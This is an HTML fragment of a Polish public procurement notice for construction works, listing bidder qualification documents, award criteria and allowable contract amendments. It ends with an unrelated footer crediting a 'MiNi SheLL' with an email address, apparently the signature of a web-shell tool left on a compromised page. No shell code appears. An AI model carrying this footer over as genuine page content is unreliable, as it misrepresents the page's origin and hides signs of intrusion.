<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Atesty, deklaracje zgodności i certyfikaty na materiały i urządzenia użyte przy wykonaniu przedmiotu umowy.
Wykonawca może zamiast zaświadczeń, o których mowa w części VI SIWZ w ust. 12 pkt 1, złożyć równoważne zaświadczenia wystawione przez podmioty mające siedzibę w innym państwie członkowskim Europejskiego Obszaru Gospodarczego</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo lub inny dokument określający zasady reprezentowania wraz z osobami uprawnionymi do reprezentacji wykonawcy w postępowaniach o zamówienie publiczne.
Wszystkie wypełnione i podpisane załączniki ze specyfikacji istotnych warunków zamówienia oprócz projektu umowy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - okres gwarancji - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania następujących istotnych zmian postanowień zawartej umowy:
1)	zmiany danych dotyczących stron umowy, jak zmiana nazwy (jeśli nie oznacza przekształcenia podmiotowego lub przedmiotowego) siedziby, adresu, numeru konta bankowego np. w przypadku zmian wpisów w ewidencji działalności gospodarczej lub KRS;
2)	osób upoważnionych, jako przedstawiciele stron, itp. w przypadku nieprzewidzianych zdarzeń losowych m.in. takich jak choroba, śmierć, ustanie stosunku pracy;
3)	zmiany podwykonawcy lub wprowadzenie nowego podwykonawcy wymagana jest zgoda ZAMAWIAJĄCEGO. ZAMAWIAJACY zaakceptuje i wyda zgodę na zmian podwykonawcy jeżeli otrzyma potwierdzenie rozliczenia się WYKONAWCY z poprzednim podwykonawcą oraz dochowa procedury określonej dla zawarcia umowy o podwykonawstwo (zgodnie z zapisami umownymi) w tym:
     - rezygnacja z podwykonawstwa,
     - zmiana zakresu podwykonawstwa. 
4)	zmiany terminu realizacji zamówienia w przypadku: 
a)	  wstrzymania robót przez ZAMAWIAJĄCEGO z przyczyn leżących po stronie ZAMAWIAJĄCEGO termin wykonania umowy może ulec przesunięciu o okres nie dłuższy niż okres wstrzymania robót;
b)	  wystąpienia siły wyższej (zdarzenia, któremu nie mogły przewidzieć, któremu nie mogły zapobiec, ani któremu nie mogą przeciwdziałać, a które uniemożliwia WYKONAWCA wykonanie w całości lub części jego zobowiązań) lub innych okoliczności niezależnych od WYKONAWCY 
lub których WYKONAWCA przy zachowaniu należnej staranności nie był
 w stanie uniknąć lub przewidzieć, jak również inne przeszkody lub utrudnienia w wykonaniu przedmiotu umowy spowodowane przez osobę trzecią - o czas działania siły wyższej oraz czas potrzebny do usunięcia skutków jej działania oraz usunięcia przeszkód;
c)	  w szczególności z powodu zmian w zakresie rzeczowym przedmiotu zamówienia, które warunkują wykonanie całości zamówienia (w tym zmian materiałowych), wykonania zamiennych bądź zwiększających zakres zadania robót, wynikających z narad technicznych, inwentaryzacji stanu istniejącego, aktualizacji dokumentacji projektowej na podstawie aneksu do minimalnych wojskowych wymagań organizacyjno-użytkowych (dalej MWWO-U) dla zadania, bieżącej realizacji robót itp., 
d)	  wykonanie zamówień dodatkowych koniecznych do prawidłowego wykonania realizowanego zamówienia lub zamówień uzupełniających;
e)	  zmiany harmonogramu realizacji robót lub finansowania zamówienia;
f)	  konieczności skoordynowania robót z innymi inwestycjami realizowanymi na terenie kompleksu;
g)	  nieudostępnienie WYKONAWCY przez Użytkownika części obiektu do realizacji robót budowlanych;
h)	  z powodu innych przyczyn związanych z realizacją przedmiotu zamówienia, a niezależnych od stron m.in.:
- nieprzewidywanych warunków terenowych, w szczególności istnienie podziemnych urządzeń, instalacji lub obiektów infrastrukturalnych;
- niewypały i niewybuchy, zagrożenie tąpnięciami, wybuchem;
- wykopaliska archeologiczne nieprzewidziane w dokumentacji;
- wydanie postanowienia o wstrzymaniu robót budowlanych z przyczyn innych niż   zawinione przez WYKONAWCĘ w przypadku, o którym mowa w art. 50 ust.1 pkt.4 Prawa budowlanego;
- konieczność uzyskania wyroku sądowego, decyzji administracyjnej lub innego orzeczenia sądu lub organu, którego konieczności nie przewidywano przy zawieraniu umowy;
- uzyskania opinii, zezwoleń, opracowań, których nie przewidywano przy zawieraniu umowy.
5)	zmniejszenie zakresu umowy w przypadku:
a)	zmiany przeznaczenia obiektu;
b)	zmian organizacyjnych ZAMAWIAJACEGO;
c)	nie przyznania środków finansowych w kolejnym roku realizacji umowy 
lub  przyznania ich w ograniczonym zakresie w planie finansowym ZAMAWIAJACEGO. 
6)	zmiany polegającej na rozszerzeniu zakresu ubezpieczenia na wniosek ZAMAWIAJĄCEGO i za zgodą WYKONAWCY w przypadku ujawnienia się bądź powstania nowego ryzyka ubezpieczeniowego.
7)	zmiany materiałowe i zmiany funkcji pomieszczeń wynikające z aktualizacji dokumentacji projektowej na podstawie aneksu do MWWO-U dla zadania.
8)	zmiana wynagrodzenia ryczałtowego dopuszczona jest w Kodeksie cywilnym poprzez art. 632 § 1 i 2 jedynie w procedurze sądowej gdy spełnione są dwa warunki:
- musi zaistnieć zmiana stosunków, której nie można było przewidzieć;
- wykonanie dzieła groziłoby przyjmującemu zamówienie rażącą stratą. 
9)	zmiany technologii wykonania robót.
10)	zmiany inne w przypadku zmian w prawie budowlanym, ustawach i rozporządzeniach, które nastąpiły po dniu otwarcia ofert oraz na skutek innych przyczyn związanych z realizacją przedmiotu zamówienia a niezależnych od stron. 
11)	W uzasadnionych przypadkach ZAMAWIAJĄCY przewiduje możliwość zamiany materiałów lub urządzeń objętych przedmiotem umowy. Powyższa zmiana możliwa będzie po uzyskaniu zgody autora projektów i jego oświadczeniu o równoważności zaproponowanych zamiennych materiałów lub urządzeń. Ogólna wartość przedmiotu umowy określona w § 2 ust. 1 z tego tytułu nie może ulec zwiększeniu.
12)	W uzasadnionych przypadkach na wniosek WYKONAWCY, ZAMAWIAJĄCY może wyrazić zgodę na zmianę technologii wykonania elementów robót. W tym przypadku do wniosku do ZAMAWIAJĄCEGO WYKONAWCA przedstawi projekt zamienny zawierający opis proponowanych zmian, rysunki oraz zgodę projektanta na dokonanie zmian obejmujących jego oświadczenie o równoważności techniczno-eksploatacyjnej zaproponowanych zamiennych rozwiązań technologicznych.
13)	W przypadku o którym mowa w § 18 ust. 4 projekt wymaga akceptacji nadzoru autorskiego (akceptacja na koszt WYKONAWCY) i zatwierdzenia do realizacji przez ZAMAWIAJĄCEGO. Ogólna wartość przedmiotu umowy określona w § 2 ust. 1 z tego tytułu nie może ulec zwiększeniu.
14)	Jeżeli w trakcie realizacji przedmiotu umowy powstanie konieczność zaniechania części robót lub wykonania robót zamiennych, nie wpływających na zwiększenie wartości umownych, to WYKONAWCA zobowiązany jest wykonać roboty w zakresie uzgodnionym z ZAMAWIAJĄCYM. 
15)	Do wprowadzenia jakichkolwiek zmian ustalonego zakresu robót, zmian technicznych 
i proceduralnych, niezbędne jest wyrażenie zgody przez ZAMAWIAJĄCEGO w formie zatwierdzonego protokołu konieczności oraz podpisania stosownego aneksu do niniejszej umowy. Aneks nie może spowodować wzrostu wartości zadania</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sinevia.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sinevia Sp. z o.o. 
05-100 Nowy Dwór Maz. ul. Paderewskiego 6, pok. 319.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.05.2016 godzina 12:30, miejsce: Sinevia Sp. z o.o. 
05-100 Nowy Dwór Maz. ul. Paderewskiego 6 w kancelarii na pierwszym piętrze.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com